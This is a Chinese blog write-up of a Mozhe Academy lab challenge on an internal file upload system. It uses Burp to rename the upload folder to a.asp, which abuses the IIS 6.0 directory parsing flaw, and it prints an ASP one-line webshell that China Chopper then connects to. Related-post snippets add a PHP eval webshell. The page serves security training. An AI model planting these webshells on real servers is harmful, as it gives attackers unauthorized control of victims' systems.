题解--内部文件上传系统漏洞分析溯源---墨者学院(菜刀连接失败问题解决)

最新推荐文章于 2024-08-14 18:34:13 发布
最新推荐文章于 2024-08-14 18:34:13 发布
阅读量1.6k 收藏 2
点赞数 1
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_43071873/article/details/108348673
版权

1.解题方向
1、试探允许上传的文件类型
2、观察服务器在处理完上传任务后返回的内容,获取上传路径
3、尝试修改上传路径,观察服务器是否允许写入权限
4.PS:使用菜刀时可能出现连接不上靶机,可以尝试点击左上角,有个重置缓存,很有可能是因为上次使用菜刀留下的缓存冲突了

进入靶场。
在这里插入图片描述

测试可上传的文件,发现txt,jpg,png等格式都可以上传

上传php、asp等都不能上传

2.由于txt可上传,所以可以在txt中写入一句话木马
在这里插入图片描述
文件上传到了一个asp文件中,所以可以考虑写入asp一句话
<%eval request(“a”)%>
3.开始操作
在这里插入图片描述

通过burpsuit抓包,修改upload为a.asp,可创建一个asp文件夹,然后放包通过。
在这里插入图片描述

文件成功传入a.asp文件夹,本题的关键就在这,为什么非得传入asp文件夹里,这是因为IIS的设计缺陷,只要上传的木马在ISS6.0环境中,并且存放在xxx.asp为名的文件夹下面,木马就被能执行

在这里插入图片描述
上传成功
上菜刀
在这里插入图片描述

拿到KEY。
在这里插入图片描述

Lin冲啊
关注
一句话php木马制作教程_菜刀无法正常访问一句话问题
weixin_35092037的博客
12-21 1935
今天自己搭建了一个php版的xss cookie接收平台。为了图操作上的方便,给自己的web放了一句话木马。但是当我打开菜刀连接时,报了500错误,如图想到可能是php版本问题导致这个问题的。查看了一下服务器上的php版本,7.0.33抓包查看菜刀数据: 去掉z0数据访问正常 那么问题点在z0数据了,解密z0数据: 看到解密后的z0数据,一下想到了...
墨者学院_CMS系统漏洞分析溯源(第9题)
weixin_50698958的博客
09-23 723
漏洞概述: 在 一、pandas是什么? 示例:pandas 是基于NumPy 的一种工具,该工具是为了解决数据分析任务而创建的。 二、使用步骤 1.引入库 代码如下(示例): import numpy as np import pandas as pd import matplotlib.pyplot as plt import seaborn as sns import warnings warnings.filterwarnings('ignore') import ssl ssl._
解决中国菜刀连接失败问题
Suuannnn的博客
11-07 8757
今天上传了一个一句话木马,但是怎么也连接不上,抓了个包发现我的php里面的代码出现了特殊字符。 原来原因就出在了编码上,于是我回去检查了一下自己的编码,原来是一不小心用了utf16,把他换回utf8就OK了,心酸!!记录一下 ...
菜刀不能成功连接已上传木马
热门推荐
weixin_34138377的博客
11-12 1万+
前言   今天在渗透测试是通过后台上传了一个木马,并能成功访问,但是用菜刀连接不上,如图1,图2所示: 图1 图2 解决方法   刚开始我以为是我的菜刀问题,于是丢给一个朋友,但是他反应不能访问,于是想到可能是没有登录的原因,导致没有权限访问! 此时我们需要使用菜刀进行登录网站,然后再用菜刀连接木马!首先我们在菜刀的链接处选中浏览网站,如图3所示: ...
菜刀连接不上DVWA
sunquan705的博客
07-20 720
菜刀无法连接成功上传一句话后的情况
DVWA中国菜刀连接不上问题(低安全级别就连不上,看看这!!)
S__White的博客
10-30 6367
测试环境:虚拟机搭建DVWA,php7.3.4 连接工具:中国菜刀 安全级别:LOW 上传一句话木马过程省略 解决发生: 解决问题: 将php版本降低为php5.0即可 (小白一枚,解决第一个问题,记录一下,希望可以帮到很多人!!) ...
菜刀工具连接不上_win7连接打印机提示错误0x00000002的解决教程
weixin_39733943的博客
11-18 499
今天小编给大家分享的是win7连接打印机提示错误0x00000002的解决教程,打印机是很多用户日常办公必备的工具,在很多地方,打印机都是以网络的形式进行连接的,当你使用打印机时,遇到无法连接错误0x00000002的问题时,可参照以下的方法进行解决。最近有win7系统用户使用打印机的时候,发现打印机出现了问题,导致无法打印,那么win7电脑无法连接打印机提示错误0x00000002如何解决呢?就...
菜刀不能成功连接已上传***
weixin_34306676的博客
12-07 2482
前言   今天在***测试是通过后台上传了一个***,并能成功访问,但是用菜刀连接不上,如图1,图2所示:                  图1                  图2 解决方法   刚开始我以为是我的菜刀问题,于是丢给一个朋友,但是他反应不能访问,于是想到可能是没有登录的原因,导致没有权限访问!  此时我们需要使用菜刀进行登录网站,然后再用菜刀连接***!首先我们在菜刀的链...
菜刀工具连接不上_xftp怎么连linux,5步完成xftp连接linux
weixin_39905037的博客
11-20 452
Xftp是一个功能强大的SFTP 文件传输软件。使用了 Xftp 以后,MS Windows 用户能安全地在UNIX和linux,和 Windows PC 之间传输文件。当然,如果要说文件传输,小编知道一款软件,它对于文件传输方面,也显得十分好用。IIS7服务器管理工具可以批量管理、定时上传下载、同步操作、数据备份、到期提醒、自动更新。IIS7服务器管理工具适用于Windows操作系统和liunx...
文件上传漏洞-菜刀-绕过
weixin_30662011的博客
07-22 442
目录 介绍 测试内容 实战 是什么?   webshell是web入侵的脚本攻击工具。简单说,webshell就是一个asp或php木马后门,黑客在入侵了一个网站后,常常在将这些 asp或php木马后门文件放置在网站服务器的web目录中,正常的网页文件混在一起。然后黑客就可以用web的方式,通过asp或php木马后门控制网站服务器,包括上传下载文件、查看数据库、执行...
墨者学院--SQL注入实战(防注入)-Access(菜刀连接超时问题)
weixin_43071873的博客
09-20 973
进入靶场,测试一下,输入and 1=1 ,提示操作被记录 数据被直接保存在数据库,可以考虑直接把一句话木马传上去 直接传,发现一句话木马没被传上去, 将木马进行url编码一下传入。 使用御剑查找后台。 上菜刀 PS:这个靶场有点奇怪,插入一句话木马后,用菜刀可能超时连不上,重置缓存也不行,遇到这种情况,可以尝试换个浏览器,换一个新的菜刀,或者换个工具,冰歇啊,蚁剑都可以。也可以参照其他博主在插入一句话时用 and 1=<%eval request(“a”)%>,具体为什么出现这个问题
记一次上传一句话木马无法链接的情况
最新发布
qq_61426144的博客
08-14 780
首先问题的前提是在密码和地址正确的情况下,依然无法正常链接,但是一句话木马又是可以正常执行的情况下,依然无法链接,(这里补充一点是在没有免杀的环境下、不然的话还要考虑木马是否免杀和过狗)此时有两种解决办法。因为这些工具在较低版本是会出现一些错误导致无法正常链接,所以可以更换最新版本的工具试一试。一、更换比较新版的工具,例如:菜刀、蚁剑、哥斯拉、冰蝎等链接工具。这里我展示的是中国菜刀,其它的工具也大同小异,清空一下缓存即可。
在虚拟机windows7中搭建DVWA靶场后后进行文件上传,却总是无法找到上传的一句话木马
diven2的博客
10-12 688
使用中国菜刀连接时去总是显示404
菜刀连接一句话木马出现:`Cannot call assert() with string argument dynamically`错误
逸鹏说道
08-25 199
前言 逆天还是上学那会玩渗透的,后来工作后就再也没碰了,所以用的工具还是以前经典款,这不,发现出问题问题 如果是PHP5则没有问题,如果是PHP7,会出现:Cannot call assert() with string argument dynamically的提示 解决 用谷歌搜了下,发现了这篇解释:https://www.freebuf.com/articles/web/197013...
解决DVWA(Low级别)中国菜刀连接失败问题(php版本问题
myec_lipse的博客
04-22 2877
今天在DVWA平台上上传了个一句话木马,用中国菜刀连接了一下发现连接不上,百度了大半天,发现是php版本问题,之前在win7虚拟机上安装的XAMPP7的php版本是php7.x版本的,需要降低一下版本,度娘说降低到5.x版本就可以连接上了(因为啥咱也不知道咱也不敢问)。研究了半天感觉改来改去的太麻烦了就直接下了个XAMPP5,复制了一下XAMPP7的DVWA文件到XAMPP5上,在5的DVWA平台上上传了一个一句话木马,菜刀就能正常连接了,棒呆! ...
远程包含shell时,上传shell时所遇到一句话木马不能上传问题解决的办法(这里为单引号双引号问题)
1stPeak's Blog
04-24 1852
远程包含shell 需要allow_url_open=On,才可以尝试远程包含一句话木马: http://www.xxx.com/echo.txt, 代码如下。 <?php fputs (fopen("shell.php","w"),'<?php eval($_POST[cmd]);?>') ?> 或者 <?php $b='<?php eval($_POST[...
墨者学院-WebShell文件上传漏洞分析溯源(第4题)
JimWu的博客
09-05 677
WebShell文件上传漏洞分析溯源(第4题) 难易程度:★★ 题目类型:文件上传 使用工具:FireFox浏览器、burpsuite、菜刀 1.打开靶场,测试上传文件类型,发现txt和php文件均不行。 2.尝试上传jpg类型,发现是可以的。 3.首先尝试上传一句话图片木马,虽然上传成功,但是最后发现菜刀还是无法连接。 4.然后尝试直接上传php文件,然后修改content-type类型。 ...
中国蚁剑简介
m0_73721944的博客
03-28 2417
一句话木马:在很多的渗透过程中,渗透人员会上传一句话木马(简称Webshell)到目前web服务目录继而提权获取系统权限,不论asp、php、jsp、aspx都是如此。中国蚁剑和中国菜刀类似,是一款webshell终端管理工具,主要面向合法授权的渗透测试安全人员及常规操作的管理员。(1)php的代码要写在
Python源码实现0-1背包动态规划题解
资源摘要信息:"在计算机科学和数学优化...通过深入分析基于Python源码的0-1背包问题动态规划题解,学习者可以更清晰地把握动态规划的思想,更熟练地运用Python解决实际问题,从而在算法设计和编程能力上都有所提升。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值